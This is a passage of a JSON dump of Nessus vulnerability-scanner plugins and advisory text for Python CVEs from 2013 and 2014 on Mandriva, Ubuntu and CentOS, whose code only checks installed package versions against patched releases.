buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nIt was reported that a patch added to Python 3.2 caused a race\ncondition where a file created could be created with world read/write\npermissions instead of the permissions dictated by the original umask\nof the process. This could allow a local attacker that could win the\nrace to view and edit files created by a program using this call. 
Note\nthat prior versions of Python, including 2.x, do not include the\nvulnerable _get_masked_mode() function that is used by os.makedirs()\nwhen exist_ok is set to True (CVE-2014-2667).\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary scripts in the server's\ndocument root (CVE-2014-4650).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0085.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0140.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0216.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0285.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python3.3\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python3-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter3-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python3-devel-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python3.3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"python3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python3-docs-3.3.2-14.1.mbs2\")) flag++;\nif 
(rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter3-apps-3.3.2-14.1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:18", "description": "It was discovered that multiple Python protocol libraries incorrectly limited certain data when connecting to servers. A malicious ftp, http, imap, nntp, pop or smtp server could use this issue to cause a denial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking gzip-compressed HTTP bodies. A malicious server could use this issue to cause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain argument. An attacker could possibly use this issue to read arbitrary memory and expose sensitive information. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled URL-encoded path separators in URLs. A remote attacker could use this issue to expose sensitive information, or possibly execute arbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n(CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in buffer functions. An attacker could possibly use this issue to read arbitrary memory and obtain sensitive information. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-06-26T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : python2.7, python3.2, python3.4 vulnerabilities (USN-2653-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:python2.7", "p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.2", "p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.4", "p-cpe:/a:canonical:ubuntu_linux:python3.4-minimal", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10"], "id": "UBUNTU_USN-2653-1.NASL", "href": "https://www.tenable.com/plugins/nessus/84428", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2653-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84428);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_bugtraq_id(63804, 66958, 68119, 68147, 70089);\n script_xref(name:\"USN\", value:\"2653-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : python2.7, python3.2, python3.4 vulnerabilities (USN-2653-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that multiple Python protocol libraries incorrectly\nlimited certain data when connecting to servers. A malicious ftp,\nhttp, imap, nntp, pop or smtp server could use this issue to cause a\ndenial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit\nunpacking gzip-compressed HTTP bodies. A malicious server could use\nthis issue to cause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a\ncertain argument. An attacker could possibly use this issue to read\narbitrary memory and expose sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this\nissue to expose sensitive information, or possibly execute arbitrary\ncode. 
This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n(CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2653-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.4-minimal\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2021 Canonical, Inc. / NASL script (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7\", pkgver:\"2.7.3-0ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.3-0ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2\", pkgver:\"3.2.3-0ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2-minimal\", pkgver:\"3.2.3-0ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python2.7\", pkgver:\"2.7.6-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.6-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python3.4\", pkgver:\"3.4.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python3.4-minimal\", pkgver:\"3.4.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python2.7\", pkgver:\"2.7.8-10ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.8-10ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python3.4\", pkgver:\"3.4.2-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python3.4-minimal\", pkgver:\"3.4.2-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2.7 / python2.7-minimal / python3.2 / python3.2-minimal / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:11:09", "description": "Updated python packages that fix multiple security 
issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme, or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the size of gzip-compressed HTTP responses. A malicious XMLRPC server could cause an XMLRPC client using xmlrpclib to consume an excessive amount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict the sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose the source code of the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control these arguments could use this flaw to disclose portions of the application memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index arguments passed to certain functions (such as raw_decode()). 
An attacker able to control the index value passed to one of the affected functions could possibly use this flaw to disclose portions of the application memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable certificate verification by default. However, for backwards compatibility, verification remains disabled by default. Future updates may change this default. Refer to the Knowledgebase article 2039753 linked to in the References section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads previously tried to close epoll file descriptors twice, which led to an 'Invalid argument' error. Subprocesses have been fixed to close the file descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the '-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile argument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported to the Python standard library, for example, new features of the ssl module: Server Name Indication (SNI) support, support for new TLSv1.x protocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl library. 
(BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information about the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-02T00:00:00", "type": "nessus", "title": "CentOS 7 : python (CESA-2015:2101)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:python", "p-cpe:/a:centos:centos:python-debug", "p-cpe:/a:centos:centos:python-devel", "p-cpe:/a:centos:centos:python-libs", "p-cpe:/a:centos:centos:python-test", "p-cpe:/a:centos:centos:python-tools", "p-cpe:/a:centos:centos:tkinter", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/87129", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2101 and \n# CentOS Errata and Security Advisory 2015:2101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87129);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"CentOS 7 : python (CESA-2015:2101)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more 
security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. 
(CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. 
(BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2015-November/002560.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2883d9e8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7185\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-devel / python-libs / python-test / 
etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:43:49", "description": "It was discovered that the Python xmlrpclib module did not restrict the size of gzip-compressed HTTP responses. A malicious XMLRPC server could cause an XMLRPC client using xmlrpclib to consume an excessive amount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict the sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose the source code of the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control these arguments could use this flaw to disclose portions of the application memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index arguments passed to certain functions (such as raw_decode()). An attacker able to control the index value passed to one of the affected functions could possibly use this flaw to disclose portions of the application memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify 